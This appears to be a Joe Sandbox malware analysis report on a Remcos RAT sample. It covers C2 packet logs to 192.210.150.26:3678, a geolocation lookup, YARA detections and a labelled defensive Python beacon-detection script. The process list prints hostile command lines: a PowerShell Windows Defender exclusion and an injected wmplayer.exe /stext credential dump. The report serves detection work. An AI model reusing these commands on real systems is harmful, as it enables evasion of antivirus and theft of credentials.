                                                                                          Dec 8, 2024 08:42:13.482965946 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.484812021 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.794271946 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795344114 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795445919 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795500040 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.796281099 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.796334028 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.796371937 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797363997 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797657013 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797722101 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.798365116 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.798445940 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.798538923 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799441099 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799509048 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799563885 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.800411940 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.800470114 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.800527096 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801476002 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801486969 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801539898 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.802558899 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.802645922 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.802700043 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.803538084 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.803591967 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.803692102 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804588079 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804718971 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804749012 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.805613995 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.805660963 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.805696964 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806643963 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806746960 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806809902 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.807677031 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.807764053 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.807775021 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.888298988 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:14.380697966 CET8049720178.237.33.50192.168.2.5
                                                                                          Dec 8, 2024 08:42:14.384546995 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:42:16.127007008 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246577024 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246644020 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246644974 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246656895 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246707916 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246718884 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246731043 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246742010 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246773005 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246869087 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246881008 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.247016907 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.247028112 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.259910107 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.366075039 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366094112 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366106033 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366131067 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366221905 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366287947 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366332054 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.379724026 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.379784107 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:43.778378010 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:43.780505896 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:43.899821997 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:13.861892939 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:13.863271952 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:43:13.982589006 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:44.138871908 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:44.140862942 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:43:44.260226011 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:01.783987999 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:02.091687918 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:02.888544083 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:04.185414076 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:06.685431004 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:11.576071978 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:14.205920935 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:14.211265087 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:44:14.330497026 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:21.185501099 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:44.225899935 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:44.227452040 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:44:44.346939087 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:14.319226027 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:14.323569059 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:45:14.442903042 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:44.440757990 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:44.442622900 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:45:44.562103987 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:46:14.509273052 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:46:14.561038971 CET497173678192.168.2.5192.210.150.26
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 8, 2024 08:42:11.865493059 CET  61675        53         192.168.2.5      1.1.1.1
Dec 8, 2024 08:42:12.004793882 CET  53           61675      1.1.1.1          192.168.2.5
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Dec 8, 2024 08:42:11.865493059 CET  192.168.2.5  1.1.1.1  0x85a7    Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
Dec 8, 2024 08:42:12.004793882 CET  1.1.1.1    192.168.2.5  0x85a7    No error (0)  geoplugin.net         178.237.33.50  A (IP address)  IN (0x0001)  false
                                                                                          • geoplugin.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49720        178.237.33.50   80                7172  C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Timestamp  Bytes transferred  Direction  Data

Dec 8, 2024 08:42:12.135351896 CET  71 bytes  OUT
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Dec 8, 2024 08:42:13.381409883 CET  1171 bytes  IN
HTTP/1.1 200 OK
date: Sun, 08 Dec 2024 07:42:13 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
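Added example (Python; not part of the Joe Sandbox report, and not Joe Security's code): the TCP table above shows packets from 192.210.150.26:3678 arriving in short bursts, and from 08:42:43 onward those bursts start almost exactly 30 seconds apart, which is the fixed-interval check-in cadence to look for when hunting RAT command-and-control traffic. The port-80 rows after 08:44:01, by contrast, are outbound-only packets to the geoplugin.net address with widening gaps and no reply. The script below reads a whitespace-separated version of such rows (the sample is a subset constructed from the table), clusters packets into bursts, and flags a remote endpoint as beaconing when the gaps between bursts are regular. The local-network prefix, the 1 s burst window, the 10 % tolerance and the six-gap minimum are thresholds chosen for this example, not values taken from the report.

```python
"""Beacon-interval analysis over a Joe Sandbox style TCP packet list."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample, copied from the report's TCP table (subset of rows).
# Columns: Timestamp, Source Port, Dest Port, Source IP, Dest IP.
SAMPLE_ROWS = """
# session with 192.210.150.26:3678
Dec 8, 2024 08:42:13.785892963 CET 3678 49719 192.210.150.26 192.168.2.5
Dec 8, 2024 08:42:13.785945892 CET 49719 3678 192.168.2.5 192.210.150.26
Dec 8, 2024 08:42:13.786189079 CET 3678 49719 192.210.150.26 192.168.2.5
Dec 8, 2024 08:42:16.127007008 CET 49719 3678 192.168.2.5 192.210.150.26
Dec 8, 2024 08:42:16.246577024 CET 3678 49719 192.210.150.26 192.168.2.5
Dec 8, 2024 08:42:16.379724026 CET 3678 49719 192.210.150.26 192.168.2.5
Dec 8, 2024 08:42:43.778378010 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:42:43.780505896 CET 49717 3678 192.168.2.5 192.210.150.26
Dec 8, 2024 08:42:43.899821997 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:43:13.861892939 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:43:13.863271952 CET 49717 3678 192.168.2.5 192.210.150.26
Dec 8, 2024 08:43:44.138871908 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:44:14.205920935 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:44:44.225899935 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:45:14.319226027 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:45:44.440757990 CET 3678 49717 192.210.150.26 192.168.2.5
Dec 8, 2024 08:46:14.509273052 CET 3678 49717 192.210.150.26 192.168.2.5
# geoplugin.net lookup to 178.237.33.50:80, then outbound-only retries
Dec 8, 2024 08:42:14.380697966 CET 80 49720 178.237.33.50 192.168.2.5
Dec 8, 2024 08:42:14.384546995 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:01.783987999 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:02.091687918 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:02.888544083 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:04.185414076 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:06.685431004 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:11.576071978 CET 49720 80 192.168.2.5 178.237.33.50
Dec 8, 2024 08:44:21.185501099 CET 49720 80 192.168.2.5 178.237.33.50
"""

ROW_RE = re.compile(
    r"^(?P<date>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)
EPOCH = datetime(1970, 1, 1)


def parse_rows(text):
    """Yield (seconds, sport, dport, sip, dip); nanosecond fractions are kept."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparsable row: {line!r}")
        base = datetime.strptime(m["date"], "%b %d, %Y %H:%M:%S")
        secs = (base - EPOCH).total_seconds() + float("0." + m["frac"])
        yield secs, int(m["sport"]), int(m["dport"]), m["sip"], m["dip"]


def burst_starts(stamps, burst_gap):
    """Collapse packets closer than burst_gap seconds into one burst."""
    starts, last = [], None
    for t in stamps:
        if last is None or t - last > burst_gap:
            starts.append(t)
        last = t
    return starts


def beacon_report(text, local_prefix="192.168.", burst_gap=1.0,
                  tolerance=0.10, min_gaps=6, min_regular=0.75):
    """Per remote endpoint: burst count, median inter-burst gap, beacon verdict.

    local_prefix identifies the sandbox host (assumption for this example);
    the remote side is the other end of each packet regardless of direction.
    """
    by_remote = defaultdict(list)
    for ts, sport, dport, sip, dip in parse_rows(text):
        ip, port = (dip, dport) if sip.startswith(local_prefix) else (sip, sport)
        by_remote[f"{ip}:{port}"].append(ts)
    report = {}
    for remote, stamps in by_remote.items():
        starts = burst_starts(sorted(stamps), burst_gap)
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        med = median(gaps) if gaps else 0.0
        regular = [g for g in gaps if abs(g - med) <= tolerance * med]
        frac = len(regular) / len(gaps) if gaps else 0.0
        report[remote] = {
            "packets": len(stamps),
            "bursts": len(starts),
            "median_gap": round(med, 3),
            "regular_fraction": round(frac, 3),
            "beacon": len(gaps) >= min_gaps and frac >= min_regular,
        }
    return report


if __name__ == "__main__":
    for remote, stats in beacon_report(SAMPLE_ROWS).items():
        print(remote, stats)
```

Bursting first, then measuring gaps between burst starts, is what makes the check robust: the 08:42:13 and 08:42:16 exchanges on port 3678 each contain dozens of packets a few milliseconds apart, and a naive per-packet interval histogram would be dominated by those. On the sample, 192.210.150.26:3678 yields ten bursts with a median gap just above 30 s and eight of nine gaps within tolerance, while 178.237.33.50:80 yields six bursts whose gaps roughly double each time and is not flagged.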


                                                                                          Target ID:0
                                                                                          Start time:02:42:06
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Users\user\Desktop\IB9876789000.bat.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\IB9876789000.bat.exe"
                                                                                          Imagebase:0x2437ebc0000
                                                                                          File size:851'968 bytes
                                                                                          MD5 hash:F443C222255E35EE6DD0E194360C23CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:02:42:06
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:02:42:08
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                                                                                          Imagebase:0x7ff7be880000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:02:42:08
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\regedit.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\regedit.exe"
                                                                                          Imagebase:
                                                                                          File size:370'176 bytes
                                                                                          MD5 hash:999A30979F6195BF562068639FFC4426
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                          Imagebase:
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
                                                                                          Imagebase:0x7ff6a3c20000
                                                                                          File size:570'736 bytes
                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:02:42:12
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
